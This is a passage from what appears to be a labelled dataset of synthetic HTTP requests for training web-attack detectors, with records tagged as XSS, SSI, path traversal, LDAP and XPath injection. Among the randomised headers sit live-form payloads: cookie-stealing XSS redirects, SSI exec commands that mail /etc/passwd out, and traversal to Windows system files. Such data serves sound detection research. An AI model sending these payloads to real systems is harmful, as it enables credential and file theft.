Proxy-Authorization: NTLM aXBhOWVraXQxZXJkckVhZXgwVE5hQXhwc3RzbHJ0b2VsZnN0b25jZWFv
Authorization: Digest cnonce="eoetai"
Range: 6-
Referer: /twssh/n8ornL/OAj6md/2t2ycad.tiff
TE: deflate;q=0.7
Trailer: Host
User-Agent: Mozilla/5.7 (Machintosh; U; PPC 4.3; Ar-Eo; rv:9.7.6) Gecko/17558881
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: 5.3 www.Ryeahcn.gif
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49140
Start - Id: 36980
class: LdapInjection
GET /b2ore6tdsCG-0sock_streamU/mXwY_RJ/eOarwOsesF3rao/cOsZK9.4QXXinjav/oavx9f@R@@31Ez.L9o/iT21iMdv77BbH/adlE4f44w-qr/uZL_u6ZJCl45w2J7f/fvzOJiqoBil@nNl@Ckwl.pl?a0Ubt=%2Bg&eyn9rehihrsm=tmihu4sakotsn2s2&q8vh5=iih%29%28++%7C+++%28anidh%3D*%29&dsra=89&065wtre=between&rii4Rr1litfoa=muneaitguerts&YWKsIza=59010&elsisiehcURof6e=6122316751&xmtii1hnislon=eMG8HB%40v9FF&Lg@vV=67799770 HTTP/1.0
Host: 65.2.210.211
Connection: keep-alive
Accept: image/jpeg;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: min-fresh=79
Client-ip: 41.167.121.88
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="2"
Date: Sat, 17 Jan 04 19:11:56 GMT
ETag: W/"YZcyTj4_d3_1LAB"
Expect: lius
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Tue, 06 Jul 04 23:40:22 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: "pc-oEkXLVe-JP1W"
If-Range: "tIEpV54KJtfgbVYqooZ"
Max-Forwards: 0366
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM eW9ucG1pN25zYWlSa3JmZWlrdFRXMm9oc2dkc2VkbmxlZjNv
Authorization: Digest algorithm=lHno4y97
Range: 84-,-422477,1197-5319
Referer: /mdbwak/nyzritsv/neieFh/iwoyxn/oCmsdg.jpg
TE: deflate,trailers,chunked
Trailer: Max-Forwards
User-Agent: rfheYp.gGo http://www.hle5y.fr
UA-CPU: StrongARM
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 654x7541
Via: 2.1 9.74.30.161:311, 7.0 www.rd0Dyhar.jpg, 7.6 203.148.148.139
Transfer-Encoding: 6eo02
Upgrade: eslm/4.5, njAt/8.0
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 4593021783716355
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36980
Start - Id: 47043
class: XSS
GET /hd4bhnwAdi2p2owT/eYuP/uhooahxst/fzU8thz3pbMB5Vawu/t2/kwOzLU-tgo99vprNDLVK.cfm?eeimnlo=cr&tr0o=%3Cdiv+style++++%3D%22+++++width%3A++++expression%28%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.it.com%2Fcgi-bin%2Ftreritse.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22%3E HTTP/1.1
Host: www.elC8nra.gov:80
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 182.170.20.121
Cookie: rdov=uee1oucciaGnas2vo;ooelM1ciS9aa=/oohE
Cookie2: $Version="9"
Date: Sun, 15 Feb 04 05:25:26 GMT
ETag: W/"ZuWdza31fuAokGFJWS"
Expect: tbosO4uw=ourpoii
From: hyzyx@lhmoxRAr.net
If-Modified-Since: Mon, 20 Dec 04 22:30:59 UTC
If-Unmodified-Since: Tue, 29 Aug 06 20:32:36 GMT
If-Match: "ihOluy_eWK7PW5T"
If-None-Match: *
If-Range: *
Max-Forwards: 6224
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM WnIwdnBERGM3cmJuZXJsbmk1RWVlZWd0MGllRW9hc21l
Authorization: lEte cnsibeh=ossr0o
Range: 388869-790680,430-,-04157
Referer: http://www.siesfxse.de/hini/5fni6/arBoMrt.pdf
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.8 (compatible; Konqueror/0.8; Open BSD i586; ruee28)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 7231x6416
Via: 4.1 www.oinsnu.js, FTP/9.7 56.150.162.79:6411
Transfer-Encoding: deflate
Upgrade: 1yiN/0.8, rtga/9.0
Warning: 052 www.Unilgch.jpeg "ie5oeuioieegkTE3" "Sat, 11 Jun 05 12:14:11 UTC"
X-Forwarded-For: 230.76.2.187
X-Serial-Number: 9140776636485
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47043
Start - Id: 45328
class: PathTransversal
GET /rJBXcfvo2/sRffbn/Zged7nhum3wi1f/osBrt5cgrRRfcHvEH.css?n7iSdpesca=umat&rn=4ab30ohjmg&usilnC=i%25er4sr+eBimgohdas%3F&ppD.V7=so+c&piM3o1aec=aAavFuiAmFv5&BZ87YQmk=mUbidnop&5QRautoexec=axh%3Brycltmplhynlh&gs=2363&nrre6pj=hu5ICB HTTP/1.1
Host: 186.55.123.183
Connection: keep-alive
Accept: image/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: lurh-hwa
Cache-Control: max-age=0
Cookie: bwghhet4ilq=../../../../../../WINNT/autoexec.bat
Cookie2: $Version="433"
Date: Fri, 12 Dec 08 16:17:11 UTC
ETag: "HahGzHmxCTk7y_7H"
Expect: 100-continue
If-Modified-Since: Fri, 14 Nov 08 20:32:19 GMT
If-Unmodified-Since: Sat, 04 Dec 04 04:25:43 UTC
If-Match: *
If-None-Match: "SxCRLTGm.THzPks2GHo"
If-Range: "mdFeEAx_bheLSRhtv"
Max-Forwards: 882
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest response="ed8dfEc306DDbBD0ba58b281AD1168bF"
Authorization: Digest username="6m2dgroj"
Referer: http://www.IoFgrch.fr/eocii.wmn
TE: deflate;q=0.3,trailers,chunked
Trailer: If-None-Match
User-Agent: ie3uar (e7gSWG2o6y; y7tc@hf2; 9bR8lHO; rUidIkb3n; svMo0n2)
UA-Disp: 3916,328,8
UA-Color: color32
Via: 6.3 www.8iUaa.html
Transfer-Encoding: identity
X-Serial-Number: 341978779570501

null

End - Id: 45328
Start - Id: 47814
class: XSS
GET /uea/h@vu3QOiUaGHEVA/tyV5ZUdraAwBbc/nNaAnI2eel/487ne%usW/wie4juyinistnnsraqiT/dU3u/46jF/pqemeoOe6ehogc/nrhoce4t/aHupt.cfm?n1r2m2.vO=14&toiXSlieorr=zu7qEW7coD&eTzltL=%26%3Cscript+++%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.nastge.com%2Fcgi-bin%2Ftantit.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E&cehlordmnep=eLzs4C-1l&rgjZeihhdnhhex=10&y46gum=rstrftrdhmgausai&2Ohsl=ai4Celbg0netcatq9oe HTTP/1.1
Host: www.tiEl0.cz
Connection: aiach
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: fynn8='tjry'
Client-ip: 203.124.10.83
Cookie: xb=tsjomnqEsws>e;qh=6887
Cookie2: $Version="0"
Date: Mon, 06 Dec 04 07:08:59 GMT
ETag: "cb8w5hhmsZL2xLnl0P0C"
Expect: 100-continue
From: imsidtn@unertldl02.de
If-Modified-Since: Fri, 21 Dec 07 16:17:34 CET
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "mXTKK6G1B_WP-tlrg"
If-Range: Wed, 18 Apr 07 14:05:50 UTC
Max-Forwards: 911
MIME-Version: 2.7
Pragma: dsh=e
Proxy-Authorization: Digest uri=/g5nxxi/tLEiado/9dOtoth5/deavlru/bosadp.aspx
Authorization: Digest nonce
Range: 2820-37,-5180,81-
Referer: /RiBnahua/oi7im/nthvlT.aspx
TE: gzip;q=0.1
Trailer: TE
User-Agent: slndsloIyv (s9R1vd; nTnZzF1m; 3ByqJ.u0@V; nX4pwSP-DH)
UA-CPU: x86
UA-Disp: 8203,202,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 907x206
Via: 9.2 www.serecet.htm:6, FTP/5.2 www.ysde1o.jpeg, 6.7 www.pn7nmt.tiff
Transfer-Encoding: deflate
Upgrade: sejn/3.6
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 3578950
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47814
Start - Id: 40147
class: SSI
GET /e-5Qbb/iIy2yZSnFYW6nkR96ug/r8/sDHscript/oyiAote7oqunIdeenf/IW/y_DLDPs0CVvcp3vAXi/mnOxde0u/arlui7a0fdrwlueP16b/eSQ/een/eFpb2Ayr.rdYkcJ7P.shtml?3JT_allt=7&erdnm=9xs%2Bsve%27pivj%3Ao&gtha=sEedaotEkat7krd&Upasswdzeeinput9wU=%2Bk%2Fdinput3%25aaiv&evm=88186684&zze=195624&Ant=mvshTlV&hrmMi=lmkniSpP&a9O4e=rA-D&ie=eNME&arEneterrni=%3C%21--++++%23exec+cmd%3D%22%2Fbin%2Fmail+++1oMenotd.com+++%3C++++%2Fetc%2Fpasswd%22--%3E&nes=rnm+b&ontih=dr HTTP/1.1
Host: 223.66.178.239
Connection: close
Accept: application/x-tar;q=0.6
Accept-Charset: gb2312;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: aU='r3mir'
Client-ip: 40.73.55.49
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="9"
Date: Fri, 17 Jul 09 11:01:36 UTC
ETag: "qmJ@VE5bg4LWn_pk"
Expect: tnhh=9reuMdud
From: stce@ygsk.st
If-Modified-Since: Sat, 05 Sep 09 20:19:26 CET
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: "xNDZ0sVZPKX6zCXH"
If-Range: Tue, 06 May 08 11:08:00 UTC
Max-Forwards: 6356
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic SWJlbHQ1dGw6M25Tbm50ZQ==
Authorization: Digest qop=auth
Range: 543-5,-37763,-41932
Referer: /Gdhwmodm/tAep1dg/teojTq/haola/adug0.txt
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 8.4; en-ea; rv:0.1.6) Gecko/45458689
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5714x2082
Via: 4.3 www.Nheei.png:5, raiYo/8.5 16.226.82.172, HTTP/0.2 236.65.96.156
Transfer-Encoding: deflate
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 567 250.136.1.216:51630 "tiectbulaky" "Fri, 20 Jul 07 07:00:48 CET"
X-Forwarded-For: 197.14.49.35
X-Serial-Number: 7694674190970
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40147
Start - Id: 35761
class: XPathInjection
GET /fUNCrTdp/iCLxfBDnUs2xhbeueV4/tetLsoayxpm/eap/a_W_OC/jtEEeoB/re3zeRaMGhylfdlYC_/hzg-Mgkumzez4Fsl-/YNqeUWR1U/tWhBOL_bgV98PvpjCZm/ln.gif?yxv5T=a&ffyr=aaogwdnlpz8&twnE9rcn=r8hawetgohq1monoNv&RcmdcylZF89Hu=0260&aot=911506&Ihg6haeusa5aeme=60749&n2eBIyvuoe8tn=9+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++61074%3D HTTP/1.0
Host: 44.36.183.212
Connection: keep-alive
Accept: application/*;q=0.2, video/mpeg, application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: er-irsH
Cache-Control: no-cache
Client-ip: 223.250.208.170
Cookie: U24O=4c;8lcrnfiaId1vfb=bOw2GkcHWm;gbafeayrnera=25;Ocrbebamilni=683675;oioo9smba7sft=6309254;-8Kift=23
Cookie2: $Version="2"
Date: Thu, 27 Aug 09 24:42:15 GMT
ETag: W/"tsvQDtbvV-90U6TPs"
Expect: 100-continue
From: thoeIa@hnsapex3S.gov
If-Modified-Since: Thu, 02 Aug 07 08:53:55 UTC
If-Unmodified-Since: Sun, 18 Mar 07 21:09:12 GMT
If-Match: *
If-None-Match: "Ie1-XHSQv.5nL4m"
If-Range: "XQJ_4Fd1TI3VIeCVyS4D"
Max-Forwards: 83
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: NTLM ZWVzZDhocm40bnJjbnJJdXJhYzR0bmFlZGcyMXI5c3JkRW9leg==
Range: 9042-41
Referer: /natt.css
TE: trailers
Trailer: If-None-Match
User-Agent: lensQt5
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 6100x360
Via: 9.9 www.acuneet.htm, fLue/7.9 122.43.133.37
Transfer-Encoding: deflate
Upgrade: inuOi/4.6, b70ue/5.1
Warning: 145 165.132.233.207 "niz6ueo" "Sun, 02 Mar 08 13:20:23 UTC"
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35761
Start - Id: 39060
class: LdapInjection
PUT /ZYcopy/00te389VGsM/2.xz1o/1olntjSdieqpjsb/acND/e-jJI7O95Yh6tZwPfJbc/rdeicioni8on4saa/jlimbJL1DR/t_40fz@MPNa/edgF9_txR/emeooni9cAjedatrandt.pl? HTTP/1.1
Content-Length: 47
Content-Language: eatwDdw,qtt,5qsF
Content-Encoding: gzip
Content-Location: http://www.ESzrb.org/enwe/te2ii/svhfghek.msf
Content-MD5: cmNudWVsb3BJbjN3b2VyWQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 07 Aug 07 13:06:41 GMT
Last-Modified: Fri, 30 Jan 04 12:48:15 CET
Host: 166.242.64.185
Connection: swrnri
Accept: image/*, image/jpeg;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 48.137.231.218
Cookie: aqeTelax=5228583;mrinsaj=liktr)(  |(io=*)
Cookie2: $Version="955"
Date: Tue, 08 Feb 05 09:33:32 UTC
ETag: "SxmIdHH4qLVx09fj"
Expect: 100-continue
From: icaden@piqhAfS1E.uk
If-Modified-Since: Sun, 04 Jan 09 11:15:42 CET
If-Unmodified-Since: Fri, 17 Oct 08 19:20:30 UTC
If-Match: *
If-None-Match: *
If-Range: "ViHvbB4RZ.kxxYYKRY"
Max-Forwards: 0
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: usrL exto=oweCE
Authorization: Digest realm
Range: -436
Referer: /dpha/tsesesop.php
TE: trailers,chunked;q=0.9,gzip
Trailer: Expect
User-Agent: uuenaaba/0.5.2.8
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 0434x6105
Via: WtxYa/8.7 www.ertc.html, tdEik/4.7 www.n9ndx.png, HTTP/2.6 95.157.135.107
Transfer-Encoding: 66tto; 6lrcHda=gyecft
Upgrade: AoeT/2.5, uic/2.7, Eiudri/3.6, l7gN/4.2
Warning: 030 103.121.67.250 "ereFagttoerTnEa" 
X-Serial-Number: 53018392304378
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hna=9&tiuMit=hvekgy8fhieueel&pw6fholimee=158155

End - Id: 39060
Start - Id: 40282
class: SSI
GET /eiESmK@FMXXLY/kb-VGQ/KOblinkbinO0eL2qtmp/iAz/Dwei9iHtoceEd/is4leAc5plnQ_QIg_egn.dll?xQR7_kPpE=e%3Fmwhere+h+&av8eehao5wadlTw=e&ettty=o+&tIu9YXh=%24iboot.ini&rnIehtotE=8071776&iimsnu=1783016&tjs606=+thtnheue%28id&xl=%3C%21--++++%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Ceceh%5CSa6tEesyI%5Cstzrdh.exe+d%3A%5CZaieffandh%5Cwww.anchnarame.org%5Cnitazps96s%5Cdatabase.mdb++%2Fx+++exporttofoxpro%22--%3E&rso8bshfnie5=0110762&petikntnieNoi=TGd%7Csoeoo HTTP/1.0
Host: www.itlercfrzR.org:80
Connection: keep-alive
Accept: audio/basic;q=0.0, text/*;q=0.9
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.8, gzip
Accept-Language: *;q=0.5
Cache-Control: dHdyj='kco'
Client-ip: 28.25.194.6
Cookie: .0N_yshutdownY_SR=sdLHqNAzkrYX;kiee=fntyoB0;hlrmIkcAii=enyhctcMhwinntCoda:ew;Kcoelgone=9191;wa8YES=11330624;kOStImtosu=264614
Cookie2: $Version="86"
Date: Sun, 23 Jul 06 15:46:39 UTC
ETag: W/"OW87M.Z_H28iIF_"
Expect: ur5b1dl
From: sinl@n3biht.ch
If-Modified-Since: Sat, 05 Jun 04 21:43:24 GMT
If-Unmodified-Since: Mon, 22 Oct 07 04:13:15 GMT
If-Match: *
If-None-Match: "ZptszONkLvdLgvg"
If-Range: Thu, 23 Dec 04 19:18:37 CET
Max-Forwards: 7
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Tanare rhil=drTtinN
Authorization: Digest opaque="fzlzeHe2"
Range: 37574-,839789-
Referer: /iaerue/enmen.wmn
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/1.9 (compatible; Konqueror/2.9; SunOS sun4u; ysie; 8oharetl0)
UA-CPU: MIPS
UA-Disp: 7013,7944,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1099x290
Via: 4.1 www.te1aciqr.jpg:36661, 6.5 118.17.15.185:35, FTP/8.4 30.74.40.227:8409
Transfer-Encoding: identity
Upgrade: shUaoo/4.0, eat/0.9, y0aio/2.5, enluo/1.0, siaeN/8.6
Warning: 559 www.x4kdcw.js "6b1la22lnngto" 
X-Forwarded-For: 147.185.144.226
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40282
Start - Id: 36864
class: LdapInjection
GET /oHkoiileIt.php?ozrettt=etn&uaneNtrlLfia=ihtehm&mhg=te&ay2naEeezlPtjmo=het%7COtue%26ff%2Fde&SaoltTlasb=ynrrjek%28Vb7an&@1CHkVH=emailg&1Tdivbyd1=eohaxetpiasesi1&n3oitm=ye%2Fz&e5ro=7747359&wEnrshaHb=4542&sAowoht=pt%3Aa+Ao%3C2sE&qsmrltaaz=h+&teyeviet=ie&r0eh2=e5iisdchildea6&DHexectjr3255=e+nbefa HTTP/1.0
Host: www.rfodd.gov:2
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: nOb-e, 6Heln-aRn, elA-ionWnhi
Cache-Control: no-cache
Client-ip: 17.48.219.199
Cookie: ie4leeaaw=9f<wp-hho
Cookie2: $Version="498"
Date: Thu, 18 May 06 18:49:00 CET
ETag: W/"qpDcVlO37f0Z7AtqUKOf"
Expect: 100-continue
If-Modified-Since: Thu, 19 Mar 09 18:04:43 CET
If-Unmodified-Since: Thu, 21 Apr 05 10:22:18 GMT
If-Match: *
If-None-Match: "x.t2TvDHJA71utb9Cmk"
If-Range: Wed, 08 Nov 06 10:50:04 UTC
Max-Forwards: 0
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM VGhldGpocnR0dHJpdjhjdG9ocnNuY2Vhc25leWZ5ek9ybg==
Authorization: NTLM aXBoa3IzdGV2cnRjb0VhZUVvbzl5YXQ4dWU1V09zYWFkZXRlbmlsYQ==
Referer: /leeye.tiff
TE: trailers,chunked,gzip
Trailer: Upgrade
User-Agent: )(| (rt=ddln*)
UA-Disp: 2222,7626,16
UA-Pixels: 3973x1983
Via: 9.0 183.44.67.255:68, HTTP/6.9 www.easw.shtml
Transfer-Encoding: compress
X-Forwarded-For: 207.34.209.252
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36864
Start - Id: 45910
class: PathTransversal
GET /8accept64.BMYep/wbadad.css?vWwpKIechoY=21342&el8euAnteeyg=bE%2BTe3aEit&XOFP1TRL9J9=hiz&iw8YS=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&yveW4jPoubm=-usa&rqttunviara=ap0a&sdaiwts9tsa=5802455 HTTP/1.1
Host: 145.100.161.38
Connection: ihi2g3
Accept: image/*;q=0.6, video/quicktime;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: Gel=9l
Client-ip: 91.176.97.113
Cookie: hacsar8qmpmtt=or<uT$mphp6j+li&tma;sqs=03234472;aAn4t5c5tr=shdno
Cookie2: $Version="230"
Date: Fri, 26 Nov 04 03:05:08 UTC
ETag: "F9XeIBzlGuOQhpHd7UtM"
Expect: 100-continue
From: sdns@tal3sea.gov
If-Modified-Since: Wed, 21 Feb 07 07:03:11 GMT
If-Unmodified-Since: Tue, 13 Mar 07 16:06:10 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 04 May 07 01:01:48 UTC
Max-Forwards: 59
MIME-Version: 1.5
Pragma: wnie='tiat'
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest realm
Range: -106180,0973-,3598-
Referer: /8etnIka.dll
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: qbLe (ptLvE@zA)
UA-CPU: PowerPC
UA-Disp: 1794,840,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 4595x1071
Via: 0.7 175.113.250.250, 2.3 www.qrHneloM.shtml
Transfer-Encoding: compress
Upgrade: fes/4.2, eismN/3.9
Warning: 059 www.ksairqwg.js:39883 "donee6dnsowllcjs" "Sat, 22 Jan 05 11:00:58 CET"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 9152638367
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45910
Start - Id: 45952
class: PathTransversal
GET /jeanvSte0eDGnhu9/o3gbphypz/uUgl-iHMU.tzKCf2-gn/3k1tJqkDcZcq8p/jSANWSPFAX.jpg?smheprAhedsjCa=5738145230&T9Y7x3NL=fGtr6ueheeRO4dis&B4Q7wjRB9.EV=laUgHbLi&wprexddmw=%5CWINNT%5Csystem.ini&zt=b8hrosHghrRzmAr&sOyisitauavrIt=31145&p1schBono=737374 HTTP/1.1
Host: 21.183.32.36:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.34.102.44
Cookie: eni=xaael;wqnmoitnwd=suBY;omawtCiselr=ltAi-7ndocument@+g;taxtR0u0=esu8Br;ZlhqR=replacet%a1edhndxN1
Cookie2: $Version="028"
Date: Sat, 20 Feb 10 19:17:39 CET
ETag: W/"Jy54JyeN5DvDzJBlnR"
Expect: e8ch
From: cpanabu8@leeWhlh.biz
If-Modified-Since: Wed, 19 Apr 06 09:42:23 CET
If-Unmodified-Since: Sun, 03 Feb 08 02:15:35 GMT
If-Match: *
If-None-Match: "SQSVrLo@hA7gC1L10"
If-Range: Fri, 30 Apr 10 21:46:22 GMT
Max-Forwards: 6445
MIME-Version: 5.8
Pragma: lots=Ehtegor
Proxy-Authorization: atacrJ nOIndN=dosn6sfe
Authorization: Basic d2ZvaHRrczplR25scm9lcw==
Referer: http://www.fyoenrtt.org/tdua3ead/acmwnMs/tctieh/icrtnn/toeCle.tar.gz
TE: deflate;q=0.7,trailers,deflate
Trailer: Accept
User-Agent: eaHus (arEr4w@O1P)
UA-CPU: x86
UA-Disp: 3135,8994,8
UA-OS: FreeBSD
Via: FTP/1.9 238.168.119.29, tnl/6.4 214.16.236.249:2
Transfer-Encoding: sinlt; m7lee5RI=cEni
Upgrade: ihmRi/3.1, csAMi/2.6, ruqry/0.0, hejq/9.2
Warning: 770 www.ooOUOat.jpg "ndemratIge3" 
X-Forwarded-For: 79.119.72.4
X-Serial-Number: 6933322511
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45952
Start - Id: 48684
class: XPathInjection
PUT /oiRlae7phqtc/SBtelnet.wp-jinclude/lP_EOX-/ab3V3P/eohhsctrU/yYvou-w2GbZdobV/uOlS/2oIasRP7RK/ef0QsLCov_ZUyrH/epmD56H7X.ez.sh? HTTP/1.1
Content-Length: 326
Content-Language: hw4
Content-Encoding: compress
Content-Location: http://EaSse.com/se92/aai1/donI.nsf
Content-MD5: aGVhZndDZVNpaDl0ZWlldw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Jun 06 15:14:33 UTC
Last-Modified: Sat, 16 Apr 05 13:37:22 CET
Host: www.uliEawy.biz
Connection: wAff
Accept: video/quicktime, image/gif, video/*;q=0.5
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: Ah-utede, y-ct, kryttLq-Gfk;q=0.7, aidg2-xserAh
Cache-Control: min-fresh=08438
Client-ip: 187.92.28.4
Cookie: ewAntotwc=athetnwd
Date: Thu, 28 May 09 09:41:09 UTC
ETag: W/"Z13fAUsM8R8Bav-Kl"
Expect: hcesm
If-Modified-Since: Sat, 24 Oct 09 12:42:47 CET
If-Unmodified-Since: Sun, 28 May 06 22:43:28 UTC
If-Match: "f4@RrdbWzpGbtLPDUT"
If-None-Match: "PyBLLl@cUd9evHyRy"
If-Range: Tue, 28 Dec 04 20:22:45 GMT
Max-Forwards: 4484
Pragma: ahbqHatt='atk'
Referer: /retv/Sed3i/s17ba/eraraaf/b7oomm.wmn
User-Agent: Mozilla/5.8 (compatible; MSIE 4.8; Linux i586; haeh; ghtShdfomt; mfZesolf)
UA-Color: color16
UA-Pixels: 640x9904
Via: 9.0 www.nEv2aeS.jpg
Transfer-Encoding: deflate
Upgrade: ereeos/7.6, tgr/8.5, 4idl/4.6, oth/2.8, Gpir/5.3
X-Serial-Number: 3185085450816900238

YSIHt=R &tof=mk@.S7u&i7scd=0076240&l0mnhPnirt5wer=(i   <     count(ryee/child::text())    and j    < count(n5rnjh/child::comment())   and    k <    count(Oed7re/child::*)    )&wnkL=atmr6t:&Jv6@_vbscriptVQJrl=1&son0hapw3r=3511540&Eoa6oPciaseaa=evaleI ovarvy&hRevalSuzE=uAAUSb

End - Id: 48684
Start - Id: 35725
class: XPathInjection
GET /faxaanntunogeiEblee.tiff?b4cmmpedltrho=9250325&eckm=el6dynflaodAiaE&ro3ifGe4ihe=etmneirfidhnipotnt&heongmSxb=dcmdRN+u%2Bce1&xmircp9RSo=82&0kk0CL=216&ltlchnindeoea=47565&UT_NYh=6662&ntSthf6ttT=eVg_kV&vaevianh8=v0s7e3i%27+++++or++++fDc%2FH%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D52%5D++or+++++%278idhs%27+++%3D%27 HTTP/1.0
Host: www.7tscdedpe.de
Connection: tsAwttn
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 115.123.35.71
Cookie: suctdehsisY=9o= 
Cookie2: $Version="4"
Date: Fri, 17 Nov 06 01:49:11 GMT
ETag: "qY1F1gA6Xdx_fn-fmH4"
Expect: LuudNr0=yushthn;htoc=idt0
From: nptt@ai166.st
If-Modified-Since: Mon, 09 Nov 09 15:41:48 UTC
If-Unmodified-Since: Sat, 26 Jul 08 21:07:57 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 18 Sep 09 01:06:22 CET
Max-Forwards: 94
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM Z3Ntc2hscmZlTk5vc3JpYWVsYWVubGV0SWVhZ25lTXNueDl3c2VOeXN0cGVybnJh
Authorization: NTLM M2VhcnhuSGFsNG83MHNvY2lpYXdhemxwT2VzcnJkbGNuc2dhaWxzbmU=
Range: -0128,0-7163
Referer: /yire.htm
TE: trailers,deflate;q=0.4
Trailer: TE
User-Agent: E58m/3.1.0.2
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 161x6887
Via: cpiod/4.6 www.lnkenasa.gif, iasart/9.3 99.101.56.183:5301, 6.8 www.c7nnnce.css
Transfer-Encoding: deflate
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
